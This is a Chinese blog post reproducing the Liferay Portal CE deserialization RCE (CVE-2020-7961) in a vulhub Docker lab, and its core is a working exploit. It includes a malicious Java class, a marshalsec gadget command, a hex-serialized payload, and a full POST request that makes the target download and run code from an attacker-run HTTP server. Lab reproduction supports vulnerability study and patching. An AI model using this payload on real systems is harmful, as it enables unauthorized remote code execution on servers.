Liferay Portal CE 反序列化命令执行漏洞(CVE-2020-7961)

最新推荐文章于 2024-04-22 23:56:52 发布
最新推荐文章于 2024-04-22 23:56:52 发布
阅读量1k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: 安全 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111414645
版权

声明

好好学习,天天向上

漏洞描述

Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。

影响范围

7.2.0 GA1及以前

复现过程

这里使用7.2.0版本

使用vulhub

/app/vulhub-master/liferay-portal/CVE-2020-7961

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

如果环境一直没有成功启动,可能是内存不足,请使用至少2G内存(我开了6个G的)的服务器运行这个环境。

首先准备一个恶意的Java类LifExp.java,内容:

// javac LifExp.java
public class LifExp {

static {
    try {
            String[] cmd = {"bash", "-c", "touch /tmp/cve-2020-7961"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}

编译

javac LifExp.java

kali开启站点,默认是8000端口

python3 -m http.server

使用工具,访问kali的8000端口,这里IP如果填错了,就无法反序列化了

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://192.168.239.139:8000/ LifExp

在这里插入图片描述

com.mchange.v2.c3p0.WrapperConnectionPoolDataSource",{"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c6966457870740017687474703a2f2f3139322e3136382e3233392e3133392f740003466f6f;

构造payload(从userOverridesAsString开始替换)

POST /api/jsonws/invoke HTTP/1.1
Host: 192.168.239.129:8080
Content-Length: 1356
Content-Type: application/x-www-form-urlencoded
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c696645787074001c687474703a2f2f3139322e3136382e3233392e3133393a383030302f740003466f6f;"}

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
LiferayPortal JSONWS反序列化漏洞(CVE-2020-7961)分析
不忘初心,护天下安全!
06-28 753
2020年03月20日,Code White发现了影响Liferay Portal版本6.1、6.2、7.0、7.1和7.2的多个关键级别的JSON反序列化漏洞。它们允许通过JSON web服务API执行未经身份验证的远程代码。修复的Liferay Portal版本有6.2 GA6、7.0 GA7、7.1 GA4和7.2 GA2。Liferay(又称Liferay Portal)是一个开源门户项目,该项目包含了一个完整的J2EE应用,以创建Web站点、内部网,以此来向适当的客户群显示符合他们的文档和应用程序
Liferay Portal Json Web Service 反序列化漏洞(CVE-2020-7961)
晓得哥的博客
04-01 2019
作者:Longofo@知道创宇404实验室 时间:2020年3月27日 原文地址:https://paper.seebug.org/1162/ 英文版本:https://paper.seebug.org/1163/ 之前在CODE WHITE上发布了一篇关于Liferay Portal JSON Web Service RCE漏洞,之前是小伙伴在处理这个漏洞,后面自己也去看了。Liferay P...
CVE-2020-7961Liferay Portal 反序列化漏洞分析
爱国小白帽
04-26 1498
CVE-2020-7961Liferay Portal 反序列化漏洞分析 360CERT [安全客](javascript:void(0)???? 今天 作者:Hu3sky@360CERT 新媒体管家排版 2020年03月20日,Code White发现了影响Liferay Portal版本6.1、6.2、7.0、7.1和7.2的多个关键级别的JSON反序列化漏洞。它们允许通过JSON web服务A...
(CVE-2020-7961)Liferay Portal RCE 反序列化命令执行漏洞
thelostworld
12-19 1695
(CVE-2020-7961)Liferay Portal RCE 反序列化命令执行漏洞 一、漏洞描述 Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。 ​ 二、影响版本 Liferay Portal CE<V7.2.0 GA1 三、漏洞复现 执行如下命令启动Liferay Portal 7.2.0 GA1: docker-compo...
CVE-2020-7961 Liferay Portal 代码执行漏洞复现
爱国小白帽
04-28 5401
CVE-2020-7961 Liferay Portal 代码执行漏洞复现 原创 shadow1ng [雷神众测](javascript:void(0)???? 今天 声明 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内...
Goby漏洞更新|Liferay Portal 7.2.1 版本 invoke 文件远程代码执行漏洞CVE-2020-7961
m0_46699477的博客
04-07 242
Liferay Portal是美国Liferay公司的一套基于J2EE的门户解决方案。该方案使用了EJB以及JMS等技术,并可作为Web发布和共享工作区、企业协作平台、社交网络等。Liferay Portal 7.2.1 CE GA2之前版本中存在代码问题漏洞。远程攻击者可借助JSON Web服务利用该漏洞执行任意代码。
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
最新发布
记录开发和安全学习过程中的点点滴滴
04-22 1849
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
远程反序列化rce漏洞_Liferay Portal CE 系统反序列化RCE漏洞复现(CVE-2020-7961
weixin_42412939的博客
01-15 784
Liferay Portal CE是一款用来快速构建网站的开源系统。在7.2.1 CE GA2之前的Liferay Portal中,对不可信数据的反序列化允许远程攻击者通过JSON web服务(JSONWS)执行任意代码。官方网站https://www.oschina.net影响范围Liferay Portal 6.1.XLiferay Portal 6.2.XLiferay Portal 7.0...
Liferay RCE(CVE-2020-7961)
EC_Carrot的博客
07-10 391
影响范围 Liferay Portal 6.1.X Liferay Portal 6.2.X Liferay Portal 7.0.X Liferay Portal 7.1.X Liferay Portal 7.2.X 漏洞复现 首先准备一个恶意java文件LifExp.java public class LifExp { static { try { String[] cmd = {"bash", "-c", "touch /tmp/success"};
Goby漏洞更新 | Liferay Portal 远程代码执行漏洞CVE-2019-16891)
m0_46699477的博客
04-01 334
Liferay Portal是美国Liferay公司的一套基于J2EE的门户解决方案。该方案使用了EJB以及JMS等技术,并可作为Web发布和共享工作区、企业协作平台、社交网络等。Liferay Portal CE 6.2.5版本中存在代码问题漏洞。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题。
portal 常见漏洞与解决方法(基于 Tomcat8.5)
alexpdh的博客
08-09 4018
看着这么多需要修复的感觉整个人都不好了[捂脸]。借着一次修复过程,总结下常见的 Web 应用的优化和漏洞防护。由于使用的容器是 Tomcat,所以对 Tomcat进行优化能解决大部分问题。 COOKIE 常用属性设置 添加 httponly=true 和 Secure=true httponly 能有效防止 XXS 攻击。 Secure 设置是否只能通过https来传递此条...
Goby漏洞更新 Liferay Portal 远程代码执行漏洞CVE-2024-16891)(2)
2401_84248479的博客
04-13 388
欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
CVE-2020-7961 Liferay Portal 反序列化
Emonsec
05-11 1111
漏洞说明 Liferay是一个开源的Portal产品,提供对多个独立系统的内容集成,为企业信息、流程等的整合提供了一套完整的解决方案,和其他商业产品相比,Liferay有着很多优良的特性,而且免费,在全球都有较多用户。该洞是个反序列化导致的RCE,通过未授权访问其api传递json数据进行反序列化,危害较高 影响范围 Liferay Portal 6.1、6.2、7.0、7.1、7.2 环境搭建 漏洞环境:https://github.com/liferay/liferay-portal/releases/
Goby漏洞更新|Liferay Portal 7,2024年最新面试总结+解答分享
2401_84248479的博客
04-13 262
都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
Liferay Portal 7.2 CE GA1 发布
LR_is_Great的博客
08-19 436
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Ma...
构造post_[漏洞分析]LiferayPortal JSONWS反序列化漏洞(CVE20207961)分析及Poc构造
weixin_39760206的博客
12-03 542
一、背景这是一篇4月份复现LiferayPortalrce漏洞时的笔记,当时忙着做渗透没空整理,现在发出来就当是学习JODD反序列化的记录吧,里面2个Gadget com.mchange.v2.c3p0.JndiRefForwardingDataSource和com.mchange.v2.c3p0.WrapperConnectionPoolDataSource的Poc构造过程,后面还有一...
Liferay Portal二次开发与架构解析
总结来说,"Liferay-portal-tomcat-5.5-5.1.1"这个资源是关于Liferay Portal的详细教程,特别适合那些希望深入理解Liferay Portal架构、进行二次开发的IT专业人士。通过阅读和实践,开发者能够掌握如何有效地利用...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值